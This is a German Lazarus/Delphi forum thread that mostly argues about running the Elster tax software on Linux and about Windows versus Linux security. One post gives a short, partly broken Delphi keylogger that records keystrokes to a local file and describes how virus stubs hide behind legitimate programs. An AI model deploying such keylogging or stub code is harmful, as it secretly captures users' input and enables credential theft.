Trojaner in Delphi programmiert

Für alles, was in den übrigen Lazarusthemen keinen Platz, aber mit Lazarus zutun hat.

Re: Trojaner in Delphi programmiert

Beitragvon mschnell » 13. Nov 2017, 11:44 Re: Trojaner in Delphi programmiert

MacWomble hat geschrieben:Elster läuft ganz gut unter Linux, lediglich die PDF-Ausgabe ist etwas hakelig ...

Vermutlich meist Du mit Wine !?!

-Michael
mschnell
 
Beiträge: 3154
Registriert: 11. Sep 2006, 09:24
Wohnort: Krefeld
OS, Lazarus, FPC: svn (Window32, Linux x64, Linux ARM (QNAP) (cross+nativ) | 
CPU-Target: X32 / X64 / ARMv5
Nach oben

Beitragvon pluto » 13. Nov 2017, 13:12 Re: Trojaner in Delphi programmiert

Dass eine Deutsche Behörde damit den Kauf eines Produktes einer Amerikanischen Firma erzwingt, die schon von der EU mit Strafzahlungen belegt worden ist, finde ich ziemlich skandalös.

Warum? München stellt sich wieder um, nach Windows.....

Es gibt auch noch ein Windows Nachbau, der in einer VM direkt läuft. Der ist sogar OpenSorce.... Weiß im Moment den Namen nicht....
MFG
Michael Springwald
Aktuelles Projekt: PlutoArduino
pluto
 
Beiträge: 6476
Registriert: 19. Nov 2006, 12:06
Wohnort: Oldenburg/Oldenburg
OS, Lazarus, FPC: Linux Mint 17.1 Rebecca | 
Nach oben

Beitragvon Socke » 13. Nov 2017, 13:18 Re: Trojaner in Delphi programmiert

Du meinst ReactOS
MfG Socke
Ein Gedicht braucht keinen Reim//Ich pack’ hier trotzdem einen rein
Socke
 
Beiträge: 2385
Registriert: 22. Jul 2008, 18:27
Wohnort: Köln
OS, Lazarus, FPC: Lazarus: SVN; FPC: svn; Win 8.1/Debian GNU/Linux/Raspbian | 
CPU-Target: 32bit x86 armhf
Nach oben

Beitragvon pluto » 13. Nov 2017, 13:19 Re: Trojaner in Delphi programmiert

Genau....Da liefen sogar alte Windows Spiele von mir, die nicht unter Wine liefen.
MFG
Michael Springwald
Aktuelles Projekt: PlutoArduino
pluto
 
Beiträge: 6476
Registriert: 19. Nov 2006, 12:06
Wohnort: Oldenburg/Oldenburg
OS, Lazarus, FPC: Linux Mint 17.1 Rebecca | 
Nach oben

Beitragvon MacWomble » 13. Nov 2017, 14:16 Re: Trojaner in Delphi programmiert

Timm Thaler hat geschrieben:Nimm halt Windows in einer VW unter Linux" - dann kann ich auch gleich Windows nehmen.


Das sehe ich nicht so. Das Steuerprogramm brauchst du einmal im Jahr, dann kann man das auch in der Virtuellen Box mit XP machen und hat ansonsten dennoch die ganzen Vorteile von Linux für die tägliche Arbeit.

Elster verwende ich für die Umsatzsteuer etc. sowie die Übermittlung ans FA unter Linux mit Wine.

Es gibt auch Steuersoftware, welche unter Linux läuft (mit Wine, nicht nativ), z.B. Steuersparerklärung.
Alle sagten, dass es unmöglich sei - bis einer kam und es einfach gemacht hat.
MacWomble
 
Beiträge: 363
Registriert: 17. Apr 2008, 00:59
Wohnort: Freiburg
OS, Lazarus, FPC: Mint 18.1 Cinnamon / CodeTyphon Generation V Plan 6.00 (FPC 3.1.1) | 
CPU-Target: 32/64 Nit
Nach oben

Beitragvon Timm Thaler » 13. Nov 2017, 15:22 Re: Trojaner in Delphi programmiert

Das Steuerprogramm brauche ich jeden Monat für die USt-VA, und dann für die Gewinnermittlung, und für die ESt.

Das Steuerprogramm will jedesmal Updates holen, teilweise werden Gesetzesänderungen noch im laufenden Steuerjahr eingepflegt. Also brauche ich einen Internetzugang. Dazu brauche ich ein aktuelles Windows. Nix mit XP. Die Steuersparerklärung verweigert schon seit 2 oder 3 Jahren die Installation unter XP wegen fehlender Zertifikate.
Timm Thaler
 
Beiträge: 430
Registriert: 20. Mär 2016, 22:14
OS, Lazarus, FPC: Win7-64bit Laz1.6 FPC3.0.0, Raspbian Jessie Laz1.6 FPC3.0.0 | 
CPU-Target: Raspberry Pi 3
Nach oben

Beitragvon Warf » 13. Nov 2017, 19:48 Re: Trojaner in Delphi programmiert

Um mal wieder zum Ursprungsthema zu kommen, Viren können in jeder Sprache geschrieben werden. Delphi macht es einem allerdings ganz schön einfach:

Code: Alles auswählen
program Keylogger;
{$APPTYPE GUI}
uses Classes, SysUtils, windows;
 
type
  TByte256Array = array[0..255] of Byte;
 
var fs: TFileStream;
  Keys, oldKeys = TByte256Array;
begin
  FillChar(Keys, SizeOf(Keys), #00);
  fs:=TFileStream.Create('./keys.txt', fmcreate);
  try
    while True do
    begin
      OldKeys := Keys;
      GetKeyboardState(Keys);
      for i:=0 to 255 do
        if (oldKeys[I] <> Keys[I]) And Boolean(OldKeys[I] and 128) Then
          fs.Write(chr(i), 1);
    end;
  finally
    fs.Free;
  end;
end.


Und schon hat man einen simplen Keylogger (aus dem Gedächnis geschrieben, Obs wirklich funktioniert sei mal dahingestellt). Effektiv unter 20 Zeilen Code (begins und ends weggelassen).

Das Problem mit Virenschutzsoftware ist nunmal die sucht nach Mustern. Und viele Muster kommen aber auch regelmäßig außerhalb von Viren vor. Z.B. eine Stub (für die die es nicht wissen das ist ein Programm welches sich für ein anderes Program ausgibt) wird oft verwendet um Viren zu starten. Man nimmt ein typisches ungefährliches Programm (z.B. ein Spielclienten) ersetzt die Haupt executeable allerdings durch ein Stub, welche zu erst einen Virus ausführt, und Danach das eigentliche Programm. Wenn es gut gemacht wurde merkt der Nutzer nicht das neben dem eigentlichen Programm ein weiteres Ausgeführt wurde. (ich hab mir dem letzt einen Virus gefangen der war sehr schlecht, da hab ich direkt gesehen das sich ein Fenster geöffnet und direkt wieder geschlossen hat, das war sehr einfach zu entdecken).

Leider verwenden viele Patcher oder Packer das selbe System. Wenn man z.B. UPX verwendet ist das genau das selbe. UPX gibt sich als das Programm aus, entpackt dann das original Programm und führt das aus. Jetzt versuch aber mal nem Virenschutz beizubringen dabei unterscheiden zu können ob das ein gutgemeintes entdecken oder ein Virus ist.

Ähnlich sieht es bei vielen weiteren Funktionen aus. Wie soll ein Virenschutzprogramm wissen ob es sich um einen Keylogger handelt, oder das Programm tatsächlich nur die Tastatureingaben im Hintergrund aufnimmt um z.B. einen Random wert zu berechnen (z.B. VeraCrypt verwendet das als Random Input).

Als resultat wird echter gefährlicher Code oft nicht entdeckt (da Viren Entwickler einige tricks kennen um Virenschutzprogramme zu umgehen), aber für den gemeinen Entwickler, sobald dieser etwas tiefer gräbt (systemlevel Anwendungen z.B.), geht einem das Virenschutzsystem ständig auf den Sack.

Für mich ist daher die Konsequenz kein Virenschutz zu verwenden. Alle paar Monate windows neu aufsetzen ist nichts im vergleich dazu was ich an Zeit spare die ganzen False Positives von Avira und Co zu bearbeiten.
Warf
 
Beiträge: 609
Registriert: 23. Sep 2014, 16:46
Wohnort: Aachen
OS, Lazarus, FPC: Mac OSX 10.11 | Win 10 | FPC 3.0.0 | L trunk | 
CPU-Target: x86_64, i368, ARM
Nach oben

Beitragvon Marc » 13. Nov 2017, 19:54 Re: Trojaner in Delphi programmiert

Das das Programm Elster heisst ist ja schon ein Schenkelklopfer.
Das ist doch der Vogel der alles klaut was glänzt. :lol:
Also Humor scheinen sie auf dem Amt ja zu haben.

Wäre das mal besser in Object Pascal geschrieben, dann würde es überall laufen.
Oder noch besser überhaupt nicht geschrieben.
Wie ich verstanden habe braucht mann das nur um ein paar Daten zu übermitteln?
Und für so was nötigt man Firmen einen Windows Rechner zu betreiben.
Good code comes from experience, experience comes from bad code.
Marc
 
Beiträge: 148
Registriert: 11. Nov 2016, 14:09
Wohnort: Schweiz
OS, Lazarus, FPC: Linux Mint 18 (WinXP VBox) | 
CPU-Target: 64Bit
Nach oben

Beitragvon pluto » 13. Nov 2017, 20:08 Re: Trojaner in Delphi programmiert

Und für so was nötigt man Firmen einen Windows Rechner zu betreiben.

Unbedingt. Wie wir ja alle wissen, gilt ja Windows 10 als "EXTREM" sicher. Sogar sicherer als Linux...

Ich finde, es gibt nur eine Sache, die dagegen Spricht: Was wird am meisten Verwendet?
Und warum sollte jemand ein Virus oder so schreiben für etwas was nicht so oft Verwendet wird?

Ich denke das alleine dürfte schon ein Grund sein, wenn Möglich KEIN Windows zu verwenden.
Aber gut für uns: Delphi läuft nur unter Windows....
Schön das beim Virus schreiben nicht Lazarus Verwendet wurde....
Dann wäre er auch noch "Unter" Linux lauffähig.... :D
MFG
Michael Springwald
Aktuelles Projekt: PlutoArduino
pluto
 
Beiträge: 6476
Registriert: 19. Nov 2006, 12:06
Wohnort: Oldenburg/Oldenburg
OS, Lazarus, FPC: Linux Mint 17.1 Rebecca | 
Nach oben

Beitragvon Timm Thaler » 13. Nov 2017, 20:31 Re: Trojaner in Delphi programmiert

Marc hat geschrieben:Wie ich verstanden habe braucht mann das nur um ein paar Daten zu übermitteln?
Und für so was nötigt man Firmen einen Windows Rechner zu betreiben.


Nein, dafür nicht. Die Daten kannst Du auch bei Elster Online in der Webbrowser-Maske eingeben.

Das Problem ist, die Daten erstmal zu erzeugen. Da sind Heerscharen an Steuerberatern mit schwarzen Koffern unterwegs, um die Steuergesetzgebung möglichst kompliziert zu gestalten. Von wegen Steuererklärung auf dem Bierdeckel.

Zum Beispiel hab ich sehr selten Geschäftsessen. Dann aber doch mal eins. Und dann sagt mir mein Steuerprogramm: Ok, für die Umsatzsteuer kannst Du das Geschäftsessen voll anrechnen. Aber für die Gewinnermittlung darfst Du das nur zu 70% anrechnen, 30% sind Eigenanteil. Oder bei Dienstreisen: Da gelten für jedes Land andere Tagessätze für die Verpflegung. Apropos Verpflegung: Ist das Frühstück im Hotel inbegriffen, musst Du das aus der Rechnung rausnehmen. Aber Vorsicht, Hotel 7% USt, Frühstück 16% USt weil Bewirtung. Und überhaupt, bekommst Du beim Auftraggeber eine Bockwurst zum Mittagessen spendiert, vergiß nicht das aus der Verpflegungspauschale rauszurechnen.

Und dann sagen Leute: Das kannst Du doch unter Linux mit LibreOffice in einer Tabelle machen. Die haben ja keine Ahnung...
Timm Thaler
 
Beiträge: 430
Registriert: 20. Mär 2016, 22:14
OS, Lazarus, FPC: Win7-64bit Laz1.6 FPC3.0.0, Raspbian Jessie Laz1.6 FPC3.0.0 | 
CPU-Target: Raspberry Pi 3
Nach oben

Beitragvon Timm Thaler » 13. Nov 2017, 20:43 Re: Trojaner in Delphi programmiert

pluto hat geschrieben:Dann wäre er auch noch "Unter" Linux lauffähig.... :D


Naja, wenn ich sehe, wie...
... grottig die Verzeichnisstruktur unter Linux ist: Schmeiss halt alles was irgendwie ausführbar ist in /bin oder /usr/bin.
... wegen dieser grottigen Verzeichnisstruktur irgendwie versucht wird das zu umgehen: Gut, es gibt /opt, aber das nimmt kaum jemand. Schmeiss es beim User ins home, dann hast Du keine Probleme mit Rechten.
... sich die Rechte einfach aushebeln lassen: Fragte da nicht letztens jemand, wie er ein Programm mit TProcess starten kann. Und dann ein sudo davor und das Programm läuft mit Adminrechten.
... man zum Verschlüsseln der Userdaten - inzwischen das beliebteste Hobby der Virenprogrammierer - nichtmal Adminrechte braucht, weil ja alles im User-Home passiert.
dann würde ich mal nicht so laut schreien. Der bisherige Schutz basiert hauptsächlich auf: Zu uninteressant für Virenschreiber.

Unter Windows hat inzwischen so ziemlich jedes Programm kapiert, dass es in C:/Programme gehört. Nur Lazarus kommt damit nicht klar, weil der FPC partout keine Leerzeichen im Pfad verträgt. Also muss man für Lazarus extra ein Verzeichnis anlegen, welches sich nicht an die Windows-Richtlinien hält.
Timm Thaler
 
Beiträge: 430
Registriert: 20. Mär 2016, 22:14
OS, Lazarus, FPC: Win7-64bit Laz1.6 FPC3.0.0, Raspbian Jessie Laz1.6 FPC3.0.0 | 
CPU-Target: Raspberry Pi 3
Nach oben

Beitragvon AndreasMR » 13. Nov 2017, 21:00 Re: Trojaner in Delphi programmiert

Hallo Michael,

mschnell hat geschrieben:
Marc hat geschrieben:Ich kenne schon Gründe für ein Windows. Habe auch (alte) Programme die nur unter Windows laufen.

Die zwingend vorgeschriebene "Elster" Programm des Finanzamts läuft soweit ich weiß (ohne Tricks) nur auf Windows.

Dass eine Deutsche Behörde damit den Kauf eines Produktes einer Amerikanischen Firma erzwingt, die schon von der EU mit Strafzahlungen belegt worden ist, finde ich ziemlich skandalös.

-Michael

Ich hatte seinerzeit die Teilnahme an Elster verweigert. Das Finanzamt bat mich um eine Begründung. Ich habe Sicherheitsbedenken "informierter Kreise" zitiert. Das Finanzamt schickte mir dann einen Packen an UST-Voranmeldungsformularen. Und meinte, wenn die verbraucht sind und es keine mehr zum Download geben würde, dann solle ich einfach mit Kopien arbeiten, das angegebene Jahr durchstreichen und das gültige Jahr inkl. Monat handschriftlich andeuten.

Jo mei, teilte man dort meine Sicherheitsbedenken etwa?

Ich habe von denen schon lange nicht mehr vernommen.


Beste Grüße

Andreas
Ubuntu 14.04 LTS / Raspbian / Windows: Lazarus ab 0.9 bis 3.0
AndreasMR
 
Beiträge: 72
Registriert: 4. Aug 2015, 14:29
OS, Lazarus, FPC: Linux, Raspbian, Windows | 
CPU-Target: 64/32 Bit
Nach oben

Beitragvon m.fuchs » 13. Nov 2017, 21:02 Re: Trojaner in Delphi programmiert

Timm Thaler hat geschrieben:... grottig die Verzeichnisstruktur unter Linux ist: Schmeiss halt alles was irgendwie ausführbar ist in /bin oder /usr/bin.
... wegen dieser grottigen Verzeichnisstruktur irgendwie versucht wird das zu umgehen: Gut, es gibt /opt, aber das nimmt kaum jemand. Schmeiss es beim User ins home, dann hast Du keine Probleme mit Rechten.
... sich die Rechte einfach aushebeln lassen: Fragte da nicht letztens jemand, wie er ein Programm mit TProcess starten kann. Und dann ein sudo davor und das Programm läuft mit Adminrechten.
... man zum Verschlüsseln der Userdaten - inzwischen das beliebteste Hobby der Virenprogrammierer - nichtmal Adminrechte braucht, weil ja alles im User-Home passiert.

Ähm, ich glaube du hast die Konzepte hinter Linux nicht verstanden.
Software, Bibliotheken, Vorträge und mehr: https://www.ypa-software.de
m.fuchs
 
Beiträge: 1662
Registriert: 22. Sep 2006, 18:32
Wohnort: Berlin
OS, Lazarus, FPC: Winux (L 1.6, FPC 3.0) | 
CPU-Target: x86, x64, arm
Nach oben

Beitragvon pluto » 13. Nov 2017, 21:05 Re: Trojaner in Delphi programmiert

... grottig die Verzeichnisstruktur unter Linux ist: Schmeiss halt alles was irgendwie ausführbar ist in /bin oder /usr/bin.
... wegen dieser grottigen Verzeichnisstruktur irgendwie versucht wird das zu umgehen: Gut, es gibt /opt, aber das nimmt kaum jemand. Schmeiss es beim User ins home, dann hast Du keine Probleme mit Rechten.
... sich die Rechte einfach aushebeln lassen: Fragte da nicht letztens jemand, wie er ein Programm mit TProcess starten kann. Und dann ein sudo davor und das Programm läuft mit Adminrechten.
... man zum Verschlüsseln der Userdaten - inzwischen das beliebteste Hobby der Virenprogrammierer - nichtmal Adminrechte braucht, weil ja alles im User-Home passiert.

Glaub mir, man kann ein Linux so abhärten, dass kein Virus darauf mehr Startet. Das hat mein Bruder bei einem VServer gemacht der im Internet steht.
Es liegt an dir, wie du dein Linux Einstellst.

Ich habe es aber jedoch einfach und verwende sudo, wer es nicht möchte, kann es anderes lösen. Fertig.
MFG
Michael Springwald
Aktuelles Projekt: PlutoArduino
pluto
 
Beiträge: 6476
Registriert: 19. Nov 2006, 12:06
Wohnort: Oldenburg/Oldenburg
OS, Lazarus, FPC: Linux Mint 17.1 Rebecca | 
Nach oben

Beitragvon Warf » 13. Nov 2017, 21:12 Re: Trojaner in Delphi programmiert

pluto hat geschrieben:
Und für so was nötigt man Firmen einen Windows Rechner zu betreiben.

Unbedingt. Wie wir ja alle wissen, gilt ja Windows 10 als "EXTREM" sicher. Sogar sicherer als Linux...

Ich finde, es gibt nur eine Sache, die dagegen Spricht: Was wird am meisten Verwendet?
Und warum sollte jemand ein Virus oder so schreiben für etwas was nicht so oft Verwendet wird?

Ich denke das alleine dürfte schon ein Grund sein, wenn Möglich KEIN Windows zu verwenden.
Aber gut für uns: Delphi läuft nur unter Windows....
Schön das beim Virus schreiben nicht Lazarus Verwendet wurde....
Dann wäre er auch noch "Unter" Linux lauffähig.... :D


Das komplexe an einem Virus ist meistens sehr systemabhängig, die lcl z.B. hat zwar viele WinAPI Funktionen Plattformunabhängig, allerdings fehlen einige Funktionen die man normalerweise nicht so häufig braucht fehlen. Mein Keylogger von oben würde so z.B. nicht unter Linux funktionieren.

Aber eigentlich ist es gar nicht so schwer Viren zu vermeiden. Die meisten Vieren fängt man sich eigentlich nur noch durch das runterladen und ausführen von Programmen. Entweder durch E-Mail Anhänge oder als Bildschirmschoner (naja gut XP Zeiten sind vorbei) oder durch dubiose Downloadwebsiten (Software cracks bieten sich dafür an).

Diese angriffe sind auf unerfahrene Nutzer ausgelegt. Apple hat dieses Problem zum Teil dadurch in den griff bekommen das Entwickler ein Zertifikat bei Apple registrieren können (gegen Gebühr), und du standardmäßig nur diese Anwendungen ausführen kannst. So beschissen ich die Gebühr auch finde, es sichert das Entwickler die sich ein Zertifikat holen keine Vieren verteilen (da ihre Namen praktisch in dem Zertifikat stehen würden).

Als erfahrene Nutzer kann man die meisten Viren umgehen. Nur von vertrauenswürde Quellen runterladen, keine E-Mail anhänge oder dubiosen Links anklicken, und falls es nötig sein sollte solche dubiose software dennoch ausführen zu wollen kann man immer noch so etwas wie Docker oder VM's verwenden. BSD hat da ja die Jails, Unix Systeme haben chroot. So etwas fehlt in Windows leider noch (und natürlich ein vernünftiges Berechtigungssystem).
Warf
 
Beiträge: 609
Registriert: 23. Sep 2014, 16:46
Wohnort: Aachen
OS, Lazarus, FPC: Mac OSX 10.11 | Win 10 | FPC 3.0.0 | L trunk | 
CPU-Target: x86_64, i368, ARM
Nach oben

» Weitere Beiträge siehe nächste Seite »
VorherigeNächste

Zurück zu Sonstiges



Wer ist online?

Mitglieder in diesem Forum: Google [Bot] und 1 Gast

porpoises-institution
accuracy-worried